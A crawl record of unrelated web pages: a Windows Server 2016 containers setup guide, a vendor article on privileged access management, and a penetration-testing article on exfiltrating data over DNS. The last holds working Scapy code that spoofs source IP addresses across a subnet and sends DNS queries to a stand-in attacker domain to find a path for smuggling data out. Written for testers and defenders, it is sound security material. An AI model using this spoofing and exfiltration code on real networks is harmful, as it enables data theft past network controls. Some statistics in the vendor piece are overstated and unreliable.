First you have the Container Run-Time which builds the boundaries between the different containers and the operating system. To make deployment easier, faster and more efficient you build Container Images which Include the application frameworks as well as the applications on top of the OS used for the container. To use, store and share Container Images you can use an Image Repository.
The question most people will ask is how are containers different than Virtual Machines etc.
At the beginning what we did is, we installed an operating system on physical hardware and in that operating system we installed applications directly.
With virtual machines we created simulated some virtual hardware on top of the operating system of the physical server. We installed an operating system inside the virtual machine on top of the virtual hardware and installed application inside the VM. In this case, each virtual machine has its own operating system.
With container we use an operating-system-level virtualization environment which create boundaries between different applications. This is so efficient you can run multiple applications side by side without effecting each other. Since this is operating-system-level virtualization you cannot only directly on the operating system on the physical hardware, you can also use operating-system-level virtualization inside a virtual machine. This is by the way the way I see most of the deployments of containers.
Windows Containers vs. Hyper-V Containers
Microsoft will provide two different types of Container Run-Times. One is Windows Containers and the other one will be Hyper-V Containers (not Hyper-V Virtual Machines). In some cases it is maybe not compliant that some applications share the same operating system. In this case Hyper-V Containers will add an extra boundaries of security. Hyper-V Containers are basically Windows Containers running in a Hyper-V Partition, so with that you gain all the stuff you get with Windows Containers but with another layer of isolation.The great thing here, is that both Container Run-Times use the exam same image format. This means if an image is created in a Windows Container Run-Time it also works as a Hyper-V Container and vice versa.
The other great side effect of Hyper-V Containers is, that in order to run Hyper-V Containers inside a Virtual Machine we need nested Virtualization, which will be included in Windows Server 2016 Hyper-V. Btw. Hyper-V Containers are not part of the Technical Preview 3.
(Pictures from the Microsoft Ignite 2015 presentation of Taylor Brown and Arno Mihm (Program Managers for Containers)
Deploy Windows Containers
With the release of the Technical Preview 3 of Windows Server 2016, Microsoft made Windows Containers available to the public. To get started you can download a install Windows Server 2016 inside a Virtual Machine or even bare-metal. If the virtual machine has internet connection you can use the following command to download the configuration script, which will prepare your container host.
wget -uri https://aka.ms/setupcontainers -OutFile C:\ContainerSetup.ps1
After that you can run the C:\ContainerSetup.ps1 script, which will prepare your container host. This can take some time depending on your internet connection and hardware.
The VM will restart several times and if it is finished you can start using Windows Containers inside this Virtual Machine.
Managing Windows Containers
After you have logged in to the Virtual Machine you can start managing Containers using PowerShell:
Get Container Images, by default you will get a WindowsServerCore Image. You can also create your own images, based on this image.
Create a new Container
$container = New-Container -Name "MyContainer" -ContainerImageName WindowsServerCore
Start the container
Start-Container -Name "MyContainer"
Connect to the Container using Enter-PSSession
Enter-PSSession -ContainerId $container.ContainerId -RunAsAdministrator
Of course you an also use the docker command to make your containers.
Deploy a Container Host in Microsoft Azure
If you don’t want to go trough all the installation process you can also use a Template in Microsoft Azure to deploy a new Container Host Virtual Machine.
If you need some more information on Windows Containers check out the Microsoft Resources on MSDN about Windows Server Containers.
Tags: Azure, Containers, Docker, Hyper-V, Hyper-V Containers, Hypervisor, Microsoft, Microsoft Azure, PowerShell, Virtual Machine, Virtualization, VM, Windows, Windows Containers, Windows Server, Windows Server 2016, Windows Server Containers Last modified: January 7, 2019 | <urn:uuid:5d3d8a4d-4518-4d21-872f-05914b275a82> | CC-MAIN-2024-38 | https://www.thomasmaurer.ch/2015/09/first-steps-with-windows-containers/ | 2024-09-19T08:42:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651995.50/warc/CC-MAIN-20240919061514-20240919091514-00013.warc.gz | en | 0.852658 | 1,183 | 2.609375 | 3 |
Privileged Access Management (PAM) is essential due to its role in securing, controlling, and monitoring access to your most critical systems and sensitive data. By enforcing the principle of least privilege, PAM greatly reduces the risk of data breaches, many of which involve the misuse of privileged access. This system also guarantees regulatory compliance through detailed audit trails and monitoring. Automated provisioning, session recording, and continuous oversight enhance security and minimize human error. Implementing PAM not only safeguards against cyber threats but also mitigates insider risks, bolstering your overall cybersecurity posture. Discover more about how PAM can transform your security strategy.
Understanding Privileged Access Management (PAM)
To comprehend Privileged Access Management (PAM), you’ll need to grasp its definition, key components, and functionalities.
PAM refers to the methods and technologies used to secure, control, and monitor access to an organization’s critical systems and sensitive data. Key components of PAM systems include privileged user account management, session monitoring, and secure credential storage, all of which work together to enhance security and guarantee compliance.
Definition of Privileged Access Management
Privileged Access Management (PAM) focuses on controlling and monitoring who’s access to an organization’s most sensitive data and critical systems. At its core, privileged access management guarantees that only authorized users can perform privileged activities, minimizing the risk of data breaches and unauthorized access.
By implementing PAM, you can enforce the principle of least privilege, granting users only the permissions necessary to perform their job functions. This reduces the attack surface and mitigates the risk of insider threats.
Effective access control is essential in managing privileged accounts, which are often targeted by cybercriminals. With PAM, you can secure these accounts by storing administrative credentials in highly secure password vaults, ensuring they’re accessed only when necessary.
Additionally, PAM solutions offer thorough tracking and auditing of all privileged activities, allowing for greater visibility into user actions and helping to ensure compliance with regulatory requirements.
Key Components of PAM Systems
PAM systems, essential for safeguarding critical data, consist of three key components: Privileged Account Management (PAM), Privileged Session Management (PSM), and Privileged Elevation and Delegation Management (PEDM). Privileged Account Management involves securing, managing, and auditing privileged accounts and credentials. This component guarantees that only authorized users have access to critical systems, reducing the risk of data breaches.
Privileged Session Management focuses on monitoring and recording activities during privileged sessions, providing detailed control and extensive reports. This guarantees that all actions are tracked, which is crucial for audits and compliance.
Privileged Elevation and Delegation Management allows you to grant elevated access only when necessary, adhering to the principle of least privilege. This minimizes the risk of misuse by limiting the duration and scope of elevated access.
Here’s a breakdown of these components:
Component | Description |
Privileged Account Management | Secures and audits privileged accounts and credentials |
Privileged Session Management | Monitors and records privileged session activities |
Privileged Elevation and Delegation Management | Grants temporary elevated access based on necessity |
Granular Control | Provides detailed control over privileged access |
Detailed Reports | Generates detailed activity logs for compliance and audits |
Functionalities and Features of PAM
Incorporating robust functionalities and features, Privileged Access Management (PAM) solutions ensure that sensitive information remains secure while enhancing compliance and operational efficiency. One of the core principles PAM enforces is the principle of least privilege, ensuring users only access what’s necessary for their job functions. This minimizes the risk of unauthorized access and potential data breaches.
PAM solutions come packed with various functionalities designed to safeguard critical systems:
- Password vaulting: Securely stores and manages privileged account credentials, preventing unauthorized access.
- Audit trails: Provides detailed records of privileged access, ensuring accountability and transparency for compliance purposes.
- Automated provisioning: Streamlines user management processes by automatically granting and revoking access rights based on predefined policies.
These features are essential for tracking user activities, detecting unauthorized actions, and maintaining a high security posture.
For instance, session recording and monitoring within PAM allow organizations to review and analyze privileged user activities, adding another layer of security. Additionally, automated provisioning and deprovisioning of access rights facilitate efficient and secure user management, reducing the administrative burden and potential for human error.
The Growing Threat of Cyber Attacks on Privileged Accounts
You can’t ignore the alarming statistics and trends indicating that cyber attacks on privileged accounts are increasing at a staggering rate, with 100% of cyber attacks targeting these accounts.
High-profile breaches, often resulting from compromised access, highlight the significant impact on organizations.
As cyber criminals continuously evolve their tactics, it’s essential to understand the future threats and emerging strategies they might employ.
Statistics and Trends in Cyber Attacks
The growing threat of cyber attacks on privileged accounts underscores the urgent need for robust cyber security measures. With 74% of data breaches involving privileged access misuse, it’s clear that securing these accounts is critical. Insider threats, which 65% of organizations find harder to detect and prevent than external attacks, further highlight the necessity for stringent controls over privileged access.
Consider the following alarming facts:
- 80% of cybersecurity breaches are due to weak or stolen passwords, making privileged credentials particularly vulnerable.
- The average data breach cost involving privileged credentials is $4.52 million, emphasizing the financial impact of security lapses.
- By 2023, 75% of security failures will stem from inadequate management of identities, access, and privileges.
These statistics reveal significant trends and underscore the importance of addressing insider threats and weak passwords to prevent security failures.
Implementing Privileged Access Management (PAM) is a proactive approach to mitigating risks associated with privileged access misuse. By doing so, organizations can better protect their sensitive information, reduce the risk of costly data breaches, and safeguard against potential insider threats.
Effective PAM strategies are essential in today’s cyber landscape to maintain organizational integrity and security.
High-Profile Breaches Due to Compromised Access
When cybercriminals target privileged accounts, they exploit the extensive access rights these accounts hold, leading to devastating breaches such as the Equifax hack. Privileged access typically grants users control over critical systems and sensitive data, making them prime targets for attackers.
The Equifax breach, for instance, resulted in the exposure of personal information of over 147 million individuals, underscoring the catastrophic potential of compromised access.
High-profile breaches often involve the abuse of privileged credentials. According to the Verizon Data Breach Investigations Report, 74% of breaches involved privileged access abuse, highlighting the critical need for robust security measures.
When privileged credentials are compromised, cybercriminals can navigate an organization’s network almost unimpeded, accessing vital data and causing substantial financial and reputational damage.
Compromised access to privileged accounts can have far-reaching consequences. Over 80% of data breaches involve these highly sensitive accounts, emphasizing the necessity of stringent privileged access management. Without adequate protection, organizations risk not only financial loss and reputational harm but also regulatory penalties.
Securing privileged accounts through thorough access management strategies is essential to safeguard your organization’s most valuable assets.
Future Threats and Emerging Tactics
Increasing cyber threats and sophisticated tactics are making privileged accounts prime targets for attackers. As these threats evolve, it’s essential to understand the future threats and emerging tactics that target privileged credentials. Cybercriminals are constantly refining their methods, and the financial impact of security breaches on privileged accounts can be devastating, with average costs reaching $4.5 million per incident.
Organizations must stay ahead of these emerging tactics to protect their privileged credentials and mitigate risks.
Attackers frequently employ:
- Phishing: Deceptive emails designed to trick users into revealing their credentials.
- Malware: Malicious software that infiltrates systems to capture sensitive information.
- Social engineering: Psychological manipulation to exploit human vulnerabilities.
These tactics highlight the need for robust security measures to safeguard privileged accounts.
With 74% of organizations experiencing breaches due to compromised privileged access, the importance of Privileged Access Management (PAM) can’t be overstated. Effective PAM solutions help reduce the risk of future threats by controlling and monitoring access to critical systems and data.
As the threat landscape continues to grow, implementing PAM is essential for maintaining the integrity and security of your organization’s assets.
Protecting Sensitive Data with Privileged Access Management
To protect sensitive data, you must secure privileged accounts by enforcing strict access controls and monitoring activities, which is the cornerstone of Privileged Access Management (PAM).
Preventing unauthorized access is crucial, as it not only mitigates risks of insider threats and cyber attacks but also guarantees compliance with regulatory requirements.
Importance of Securing Privileged Accounts
Securing privileged accounts is essential for protecting sensitive data from unauthorized access and ensuring the integrity of critical systems. Privileged access management (PAM) plays a pivotal role in safeguarding your organization’s most valuable information. By effectively managing privileged accounts, you’re not only protecting sensitive data but also fulfilling critical compliance requirements.
Privileged accounts, with their broad-reaching powers, are prime targets for cyberattacks. Without proper control, these accounts can be exploited, leading to significant data breaches. Implementing a robust PAM solution mitigates these risks by enforcing the principle of least privilege, ensuring users only have access to the information they need to perform their duties. This approach helps in:
- Enhancing security: Limiting access reduces the attack surface, making it harder for malicious actors to infiltrate critical systems.
- Ensuring compliance: Detailed audit trails of privileged activities help meet regulatory standards and avoid costly penalties.
- Increasing visibility: Monitoring and logging user activities provide insights into potential security threats and unauthorized access attempts.
Preventing Unauthorized Access
Achieving unauthorized access to sensitive data becomes attainable by implementing Privileged Access Management (PAM) systems that restrict elevated permissions to only those who genuinely need them. By doing so, you greatly decrease the risk of data breaches and limit exposure to insider threats. PAM guarantees that only authorized personnel can access critical systems and information, thereby enhancing your overall security posture.
PAM systems work by controlling and monitoring privileged accounts, which helps you comply with regulatory requirements for data protection. These systems provide a detailed log of user activities, making it easier to detect and respond to any suspicious behavior. By securing administrative credentials in highly secure password vaults, you further lessen the risk of unauthorized access.
By implementing PAM, you not only protect sensitive data but also safeguard against cyber attacks targeting high-impact assets within your organization. Here’s a brief comparison to help visualize the benefits:
Feature | Benefit |
Restricts elevated permissions | Reduces risk of data breaches |
Controls and monitors accounts | Enhances compliance with regulations |
Secures administrative credentials | Mitigates insider threats |
Case Studies of Data Protection through PAM
Real-world case studies illustrate how implementing PAM solutions can effectively safeguard sensitive data and prevent unauthorized access. These case studies highlight the importance of robust data protection mechanisms and the role of PAM in mitigating the risks associated with cyber attacks targeting privileged accounts.
For instance, a global financial institution faced significant challenges in managing privileged access to its critical systems. By deploying PAM solutions, they were able to secure administrative credentials in highly secure vaults, enforce least privilege principles, and monitor user activities thoroughly. This led to enhanced data protection and compliance with regulatory requirements.
Similarly, a healthcare provider implemented PAM to protect sensitive patient information. The PAM solution restricted access to only authorized personnel, reducing the risk of data breaches and ensuring the integrity of their systems.
To keep you engaged, consider these key points:
- Enhanced security: Privileged accounts are protected against unauthorized access and cyber attacks.
- Compliance: Organizations can meet stringent regulatory requirements by controlling and monitoring privileged access.
- Risk reduction: Implementing PAM reduces the likelihood of data breaches and insider threats.
These case studies underscore the effectiveness of PAM solutions in safeguarding sensitive data, demonstrating their significant role in modern cybersecurity strategies.
Ensuring Regulatory Compliance with Privileged Access Management
In order to maintain regulatory compliance, it’s crucial to understand key regulations like GDPR, HIPAA, and SOX.
Privileged Access Management (PAM) helps you meet these requirements by maintaining audit trails, enforcing least privilege policies, and centralizing account management.
Non-compliance can result in severe penalties, making PAM a critical component for safeguarding sensitive data and adhering to industry standards.
Overview of Key Regulations (GDPR, HIPAA, SOX)
Ensuring regulatory compliance with Privileged Access Management is essential for protecting sensitive data and adhering to key regulations like GDPR, HIPAA, and SOX. These regulations mandate strict access control measures to safeguard personal and organizational data, making it important for you to understand how each one impacts your business operations.
- GDPR: The General Data Protection Regulation requires stringent controls on personal data, emphasizing access control and user permissions to protect privacy. Non-compliance can result in hefty fines and legal consequences.
- HIPAA: The Health Insurance Portability and Accountability Act focuses on securing sensitive healthcare information, ensuring only authorized personnel can access patient data. This regulation demands robust access control mechanisms to prevent unauthorized access.
- SOX: The Sarbanes-Oxley Act mandates financial data protection to prevent fraud and ensure accurate reporting. Implementing strong access control measures is crucial for compliance, as it helps secure financial records and sensitive data from unauthorized access.
How PAM Helps in Compliance
By implementing Privileged Access Management (PAM), you can guarantee that your organization meets stringent regulatory compliance requirements through detailed monitoring and auditing of privileged user activities. PAM assures that your company adheres to regulations like GDPR, HIPAA, and SOX by automatically recording all privileged access. This creates thorough audit trails, which are essential for data protection and accountability.
Compliance is more straightforward with PAM because it maintains detailed logs of privileged user actions and access to sensitive data, helping you easily pass compliance audits. These logs provide the necessary evidence that your organization is following industry regulations, showing that you have taken appropriate measures to control and monitor access.
Furthermore, PAM enforces least privilege access policies, ensuring users only have the privileges absolutely necessary for their roles. This is a key requirement for regulatory compliance, as it minimizes the risk of unauthorized access to sensitive information.
Penalties for Non-Compliance
Ignoring the importance of PAM and failing to meet regulatory requirements can result in severe penalties, including massive fines and legal consequences. Non-compliance penalties aren’t just financial burdens; they can also lead to significant legal repercussions that tarnish your organization’s reputation and credibility.
Various regulations like GDPR, HIPAA, SOX, PCI DSS, and NIST mandate stringent control and monitoring of privileged access, making the implementation of PAM a necessity.
When you don’t adhere to these industry standards, the consequences can be dire:
- Fines: Regulatory bodies can impose fines up to €20 million or 4% of your annual global turnover.
- Legal Repercussions: Non-compliance can lead to lawsuits, criminal charges, and long-term legal entanglements.
- Reputation Damage: Customers and partners may lose trust, resulting in lost business opportunities.
Reducing Insider Threats with Privileged Access Management
Understanding insider threats is essential for any organization, as these threats can be just as damaging as external attacks.
By implementing effective Privileged Access Management (PAM) strategies, you can greatly reduce the risks associated with insider threats, ensuring that sensitive data and systems are protected from unauthorized access.
Real-world examples of insider threats highlight the importance of robust PAM solutions in preventing malicious activities and safeguarding your organization’s assets.
Understanding Insider Threats
Insider threats, responsible for 34% of data breaches, pose a significant risk to organizations, but you can mitigate these risks effectively with Privileged Access Management (PAM).
Insider threats, whether malicious or accidental, often involve employees or contractors who’ve legitimate access to sensitive data and systems. By implementing PAM, you can take several steps to reduce these risks.
Firstly, PAM limits access to sensitive data, ensuring that only authorized individuals can reach critical systems. This minimizes the chance of misuse or unauthorized access.
Additionally, PAM allows you to monitor privileged user activities, making it easier to detect any anomalous behavior that could signify an insider threat.
Finally, PAM helps you maintain a secure environment by enforcing strict access control measures.
- Limit access to sensitive data: Only authorized users can access critical systems.
- Monitor privileged user activities: Detect anomalous behavior indicating potential insider threats.
- Enforce strict access controls: Maintain a secure environment by regulating who can access what.
PAM Strategies to Mitigate Insider Risks
To mitigate insider risks effectively, start by implementing robust PAM strategies that control and monitor privileged user access. By doing so, you can greatly reduce insider threats, which account for 34% of data breaches. Begin with enforcing least privilege policies, which guarantee that users only have access to the data and systems necessary for their roles. This minimizes the likelihood of insider misuse of privileged accounts and protects sensitive information.
Additionally, PAM solutions track and record privileged user activities, providing visibility into potential malicious insider behavior. Continuous monitoring allows you to detect anomalies and respond swiftly, thereby reducing risks before they escalate. Implementing these solutions not only helps in real-time detection but also aids in forensic analysis if an incident occurs.
Moreover, storing administrative credentials in secure, specialized password vaults enhances security by limiting unauthorized access. Regular audits and reviews of privileged access can further safeguard your critical assets.
Real-World Examples of Insider Threats
Real-world examples of insider threats highlight the importance of implementing robust privileged access management to protect sensitive data and systems. Insider threats are a significant concern, given that they account for nearly 60% of data breaches. Malicious insiders can cause substantial damage, costing companies an average of $4.5 million per year. By employing privileged access management, you can mitigate these risks effectively.
Consider these scenarios:
Disgruntled employees: A dissatisfied employee with access to privileged accounts could leak sensitive information or sabotage systems.
Negligent insiders: An employee might accidentally expose confidential data due to poor security practices, leading to breaches.
Third-party vendors: External vendors with privileged access can become insider threats if their credentials are compromised or misused.
Privileged access management solutions provide thorough security measures, including monitoring and auditing capabilities, to detect and prevent such insider threats in real-time. Implementing least privilege access controls ensures that users only have access to the information necessary for their roles, reducing the risk of unauthorized access.
Additionally, continuous monitoring and auditing help track user activities, providing visibility into potential security issues before they escalate.
Enhancing Operational Efficiency with Privileged Access Management
Implementing Privileged Access Management (PAM) can greatly enhance your organization’s operational efficiency by automating access provisioning and deprovisioning tasks, which streamlines administrative processes. By reducing the IT burden through automated PAM, you can save valuable time and resources, allowing your IT team to focus on more strategic initiatives.
Additionally, PAM improves response times and overall efficiency by ensuring that only authorized users have access to sensitive data and systems, thereby minimizing the risk of unauthorized activities.
Benefits of PAM in streamlining administrative processes
Privileged Access Management (PAM) greatly enhances operational efficiency by automating the provisioning and deprovisioning of privileged access. This automation reduces the time and effort required to manage privileged accounts, allowing administrators to focus on more strategic tasks. The benefits of privileged access management extend to streamlining administrative processes, which ultimately boosts operational efficiency.
By centralizing privileged account control, PAM provides a single point of management for all privileged access requests. This not only simplifies administrative tasks but also guarantees that access is granted based on predefined policies, minimizing the risk of unauthorized access. Automated workflows within PAM systems can handle repetitive tasks, further reducing the likelihood of human error.
Enhanced visibility: PAM centralizes logs and monitors privileged account activities, increasing transparency and accountability.
Policy enforcement: Automated workflows make sure that access controls are consistently applied, maintaining compliance with organizational policies.
Reducing IT Burden with Automated PAM
Leveraging automated PAM not only streamlines administrative processes but also greatly reduces the IT burden by automating access provisioning and deprovisioning. Automated privileged access management simplifies these tasks, making them quicker and more accurate, thereby reducing the workload on IT staff to a large extent. This not only leads to a reduction in IT burden but also enhances operational efficiency across the board.
With automated PAM, you can guarantee that access controls are consistently applied without manual intervention, minimizing the risk of human error. This automation strengthens your security posture, as it ensures that privileged access is granted and revoked promptly and accurately. In addition, automated privileged access management enables IT teams to focus on strategic initiatives, rather than getting bogged down with repetitive administrative tasks.
Here’s a quick overview to illustrate the benefits:
Benefit | Impact on IT Team | Overall Effect |
Automated Provisioning | Reduces manual workload | Increased efficiency |
Enhanced Access Controls | Consistent security enforcement | Improved security posture |
Focus on Strategic Tasks | Less time on administrative work | Greater innovation |
Improving Response Times and Efficiency
Efficient PAM solutions dramatically cut down response times and boost operational efficiency by automating access control processes. By integrating Privileged Access Management, you can swiftly provision and deprovision access for users, eliminating the delays that typically arise with manual access control tasks. This automation not only speeds up response times but also guarantees that privileged access is managed with precision and adherence to least privilege principles.
Consider the following benefits:
- Faster Response to Access Requests: Automated processes mean that access requests are handled promptly, enhancing operational efficiency.
- Streamlined Workflows: By reducing the time spent on manual tasks, your team can focus on more strategic initiatives.
- Improved Security Posture: Enforcing least privilege ensures that users have only the access they need, minimizing potential security risks.
PAM also enhances operational efficiency by offering real-time monitoring and auditing capabilities, allowing you to quickly identify and address any irregularities in access patterns. This proactive approach to access control not only optimizes your workflows but also strengthens your organization’s security framework. Ultimately, by automating privileged access tasks, you’re enabling your IT team to work more efficiently and effectively, ensuring that your systems remain secure and compliant.
Risk Management and Mitigation with Privileged Access Management
To effectively manage and mitigate risks associated with privileged access, you must first assess the potential vulnerabilities that come with elevated permissions.
Implementing robust risk mitigation strategies, such as enforcing least privilege principles and utilizing secure password vaults, can greatly enhance your security posture.
Assessing Risks Associated with Privileged Access
Given the extensive permissions granted to privileged accounts, they pose a significant risk as prime targets for cyber attacks. Privileged access management is essential in evaluating and mitigating these risks.
When you don’t have proper control over privileged accounts, it can lead to unauthorized access, data breaches, and compliance failures.
To effectively evaluate the risks associated with privileged access, consider the following:
- Visibility: Regularly monitor and audit privileged accounts to make sure that all activities are tracked and any suspicious behavior is identified promptly.
- Least Privilege Enforcement: Make certain that users have only the access they need to perform their duties, reducing the chance of misuse.
- Compliance Checks: Conduct regular compliance checks to verify that access controls align with industry regulations and standards.
Implementing Risk Mitigation Strategies
After evaluating the risks associated with privileged access, you need to implement effective risk mitigation strategies to safeguard your organization’s critical assets. Implementing privileged access management (PAM) is vital in establishing a holistic security and risk management framework. By controlling, monitoring, and auditing privileged accounts, you can greatly reduce the likelihood and impact of security breaches.
Privileged access management helps reduce insider threats and prevent unauthorized access by enforcing least privilege principles and ensuring that users have only the access necessary to perform their duties. This approach strengthens your organization’s overall security posture by increasing visibility into user activities and securing administrative credentials in highly secure password vaults.
When implementing risk mitigation strategies, focus on integrating PAM solutions that provide automated controls and real-time monitoring. This proactive stance enables your organization to identify and address vulnerabilities before they can be exploited, limiting exposure to cyber threats. Additionally, PAM ensures compliance with regulations by maintaining detailed audit trails and demonstrating that access to sensitive information is tightly controlled.
In essence, effective risk management through PAM involves a multi-faceted approach that combines stringent access controls, continuous monitoring, and thorough auditing to protect your organization’s most critical assets from potential security breaches.
Case Studies of Risk Reduction via PAM
In examining real-world applications, several companies have greatly reduced risk through the strategic implementation of Privileged Access Management (PAM). These case studies highlight how PAM controls can be instrumental in mitigating various security risks.
For instance, Company X managed to cut the risk of insider threats by 50% after integrating PAM, showcasing the effective use of privileged access management in safeguarding sensitive information.
- Company Y: By enforcing least privilege access, the company reduced unauthorized access risks by 75%, demonstrating the value of restricting user permissions to only what’s necessary.
- Organization Z: Implementing PAM led to a 60% decrease in security breaches, underlining the importance of managing privileged accounts effectively.
- Company A: Achieved an 80% reduction in data breach risks through granular control over privileged access, proving the effectiveness of detailed access management.
In addition, Company B successfully reduced the risk of credential theft and misuse by 70% through PAM, emphasizing the importance of securing administrative credentials. These examples clearly illustrate how PAM can play a critical role in risk reduction, ensuring that companies maintain robust security postures by effectively managing privileged access and implementing least privilege access principles.
Best Practices for Implementing Privileged Access Management
To effectively implement Privileged Access Management, you’ll want to start by conducting a thorough inventory of all privileged accounts to understand the scope of access within your organization.
Establishing least privilege policies is essential, as it guarantees that users only have access to the resources necessary for their roles.
Additionally, continuous monitoring and auditing of privileged accounts can help identify and address any potential security issues promptly.
Conducting a Privileged Account Inventory
Start by identifying and cataloging all privileged accounts within your IT environment to understand the full scope of access and potential security risks. This privileged account inventory is essential as it allows you to pinpoint all accounts with elevated access privileges, ensuring no account is overlooked. By doing so, you can better grasp the scope of privileged access and address any security risks associated with these accounts.
A thorough inventory also facilitates implementing proper controls and monitoring mechanisms. As you identify each account, evaluate its necessity and usage frequency to enforce least privilege access, minimizing the potential attack surface. Additionally, updating the privileged account inventory regularly maintains ongoing visibility and security, ensuring no new or altered accounts slip through the cracks.
To keep your audience engaged, consider these best practices:
- Comprehensive Cataloging: Document all privileged accounts, including service accounts, administrative accounts, and any third-party access.
- Regular Reviews: Schedule periodic reviews to update the inventory, ensuring it reflects current access needs and configurations.
- Automated Tools: Utilize automated tools to scan and monitor privileged accounts, enhancing accuracy and efficiency.
Establishing Least Privilege Policies
When you establish least privilege policies, you ensure that users only have the access they need to perform their job functions, greatly reducing security risks. Privileged access management hinges on this principle to mitigate potential threats. By implementing least privilege policies, you limit the scope of insider threats and reduce the damage that can be caused by compromised accounts.
Applying least privilege guarantees that users can’t access sensitive data or critical systems outside their responsibilities, thereby minimizing the impact of any security incidents. This approach not only enhances your organization’s security posture but also simplifies access control management. It streamlines the process of setting permissions and access levels, contributing to better operational efficiency.
Moreover, least privilege policies are essential for regulatory compliance. Adhering to these principles helps you meet various regulatory requirements by controlling access to sensitive information and maintaining detailed audit trails. Regulatory bodies often mandate strict access controls to protect data, and implementing least privilege is a proactive step in fulfilling these requirements.
Continuous Monitoring and Auditing
Continuous monitoring and auditing play a crucial role in maintaining the robustness and security of privileged access management. By implementing continuous monitoring, organizations can gain real-time visibility into privileged account activities. This allows them to swiftly detect and respond to unauthorized access attempts, thereby mitigating risks before they escalate into significant security breaches.
Effective auditing capabilities are essential for tracking user actions, changes, and access to critical systems. Regular audits not only help in identifying suspicious activities but also ensure compliance with regulatory requirements. An effective audit trail can reveal patterns of misuse or anomalies that might indicate potential threats, enabling organizations to take corrective actions promptly.
To help illustrate the importance of these practices, the following benefits can be considered:
- Real-Time Visibility: Immediate detection of unauthorized access and unusual activities.
- Regulatory Compliance: Meeting standards and laws through detailed audit trails.
- Risk Mitigation: Reducing the chances of data breaches by continuously monitoring privileged account activities.
Frequently Asked Questions
What Is the Purpose of Privileged Access Management?
You utilize Privileged Access Management to regulate who has access to sensitive systems and data. It guarantees only authorized users can access privileged accounts, monitors their activities, and helps prevent data breaches while maintaining compliance.
Why Is Privileged Identity Management Important?
Privileged identity management is essential because it helps you secure sensitive data and critical systems. You’ll reduce insider threats, guarantee compliance, and maintain detailed audit trails, ultimately strengthening your organization’s overall security and operational integrity.
What Are the Benefits of Implementing PAM?
Implementing PAM benefits you by boosting security, reducing data breach risks, and ensuring regulatory compliance. You’ll streamline access control, gain better visibility into user activities, and securely store administrative credentials in highly secure password vaults.
Which of the Following Are the Benefits of Pam?
You’ll find that implementing PAM provides several benefits. It limits access to critical systems, reduces data breach risks, guarantees regulatory compliance, streamlines access control, and increases visibility into user activities, protecting sensitive information effectively.
In today’s intricate digital landscape, Privileged Access Management (PAM) is essential for safeguarding your organization’s critical assets.
By controlling access to sensitive data, ensuring regulatory compliance, and mitigating risks, PAM stands as your first line of defense against cyber threats.
It reduces insider threats and enhances operational efficiency through secure, streamlined processes.
Implementing PAM thoroughly fortifies your cybersecurity posture, ensuring your organization remains resilient and secure in an ever-evolving threat environment. Secure your business with us here at Computronix. | <urn:uuid:af3cf0ae-4636-41c1-b027-6a050e73cad2> | CC-MAIN-2024-38 | https://computronixusa.com/why-is-privileged-access-management-important/ | 2024-09-20T10:17:11Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652246.93/warc/CC-MAIN-20240920090502-20240920120502-00813.warc.gz | en | 0.908869 | 6,591 | 2.734375 | 3 |
Following a successful penetration test, you may have large amounts of data to exfiltrate from an environment specifically hardened to make it difficult to exfiltrate data. For example, the network might have a firewall that explicitly blocks common exfiltration methods – such as SSH, HTTPS, HTTP.
It is common that you can still exfiltrate data from these networks by using DNS. For example you could make a request to a domain name that you control where the subdomain contains some information to be exfiltrated. Such as sensitive-data-here.attacker.example.com. DNS is a recursive system, such that if you send this request to a local DNS server, it will forward it on and on until it reaches the authoritative server. If you control the authoritative server, you can simply read the sensitive data from the DNS logs.
I’ve actually talked about using this technique previously, in the context of exploiting blind SQL injection vulnerabilities by way of DNS.
The difference here being that instead of trying to extract information from an application that doesn’t return the data within the interface, here we’re effectively trying to “bypass” or “avoid” strict firewall filters to extract information from an internal network.
For example, if you gained access to the card data environment (CDE) of a customer’s network and wanted to show that we could exfiltrate data en masse, in a way that their network filtering would allow and their monitoring would miss. You could likely exfiltrated the data over DNS. Since it’s very common for internal DNS to simply forward these requests on and eventually it will be passed out of the network to an internet connected DNS server.
In cases where this is usually possible, the customer explains that they require internet-connected DNS within the CDE to allow for the CDE servers to find Microsoft updates, Anti-malware updates, that kind of thing. They often explain that they require DNS as opposed to simply approving, or hard-coding, IP addresses as the IP address might change and they would therefore be left without updates.
Therefore, one way to mitigate this risk would be to allow DNS look ups to only approved hostnames. This can be done using DNS Policy, and Microsoft describes how here: https://docs.microsoft.com/en-us/windows-server/networking/dns/deploy/apply-filters-on-dns-queries
However a customer might decide on the alternative approach of restricting DNS lookups to only approved internal IP addresses. For example restricting lookups to only the internal server used for distributing updates. Believing that this greatly reduces the risk of data exfiltration over DNS by requiring the attacker compromise the update server to be able to exfiltrate data. This isn’t necessarily correct.
If you have used a firewall, or access control list, to restrict these requests it may still be possible for an attacker to make requests even if they are not on the approved server – this is because DNS requests can be sent over UDP and therefore the source IP address can be spoofed.
If you’re in an internal network and you need to spoof DNS traffic, you can do that with the packet manipulation tool Scapy (https://scapy.net/). If you don’t know which IP addresses would be approved for DNS requests but you know the IP addresses that are in the internal networks range you could write a script to send DNS requests with each potential IP address in the range and then check the DNS server logs for which requests for through.
First of all though, here’s a simple Scapy payload that allows you to spoof the source address of a UDP frame:
That payload can be supplied to Scapy from the menu, or alternatively if you would like to execute it from a python script and you have the Scapy python packed installed you can use the following:
from scapy.sendrecv import *
This would allow you to automate making modifications to the spoofed address, for example you could try all IP addresses within a /24 subnet:
from scapy.all import *
for i in range(1,255):
sr1(IP(dst="10.1.1.2",src="10.1.1." + str(i))/UDP()/DNS(rd=1,qd=DNSQR(qname="working-subnet-" + str(i) + ".attacker.example.com")), timeout=1)
If you replace the above with the DNS name for a server that you control, you can look through the logs to determine which spoofed IP address worked for exfiltrating traffic (if any) and then you can use that address as the spoofed source address and replace the “working-subnet” above with data to be exfiltrated!
Play | Cover | Release Label |
Track Title Track Authors | | <urn:uuid:9a03a905-71f3-4826-bd06-3cd2a926ee1c> | CC-MAIN-2024-38 | https://akimbocore.com/article/spoofing-packets-and-dns-exfiltration/ | 2024-09-09T14:30:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00013.warc.gz | en | 0.894498 | 1,041 | 2.921875 | 3 |
By Jessica Amado, Head of Cyber Research at Sepio
